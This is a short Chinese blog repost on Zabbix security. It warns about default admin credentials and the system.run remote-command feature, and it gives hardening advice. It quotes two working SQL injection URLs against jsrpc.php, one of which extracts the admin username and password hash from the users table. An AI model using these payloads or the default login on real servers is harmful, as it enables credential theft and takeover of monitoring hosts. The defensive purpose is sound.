zabbix系列之安全

Posted 2020-11-17 cslj2013

https://blog.csdn.net/xiaoyu_0217/article/details/73500125

存在问题：

1)zabbix的Admin口令太弱或使用默认口令(Admin/zabbix)，被攻击后导致zabbix服务器暴露，攻击者可创建”system.run[command,<mode>]”监控项执行命令，甚至获取服务器shell，获取root权限。

说明：system.run[command,<mode>]命令是agent自带的，使zabbix server可远程在agent机器上执行任意命令，如果为了方便把agent启动用户设置为root的话(AllowRoot=1)非常危险。

2)最近爆出的zabbix漏洞，在url路径(即http://****/zabbi/)后加以下代码

/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

或

jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

输出结果如下则表示存在漏洞：

 

http://www.freebuf.com/vuls/112197.html

以上为仅为漏洞验证测试方式，攻击者可以通过进一步构造语句进行错误型sql注射，无需获取和破解加密的管理员密码.漏洞具体利用

https://zhuanlan.zhihu.com/p/22082375

https://www.cnblogs.com/s0ky1xd/p/5874043.html

 

漏洞详细说明：https://www.seebug.org/vuldb/ssvid-92302

 

措施：

1、很重要的一点，zabbix的登录口令一定要复杂，不要用默认口令或弱口令。

2、zabbix的server和agent都不要以root启动，不要设置AllowRoot=1。

3、禁止agent执行system.run，不要设置EnableRemoteCommands=1。

4、经常打安全补丁，如果系统内核版本过低有漏洞的话，即使在zabbix用户下照样能获取root权限。

5.不要使用默认的 admin ，修改成其他的，guest登录也取消吧补丁也打打吧

 

其他参考：

http://www.cnblogs.com/skyflask/p/7499925.html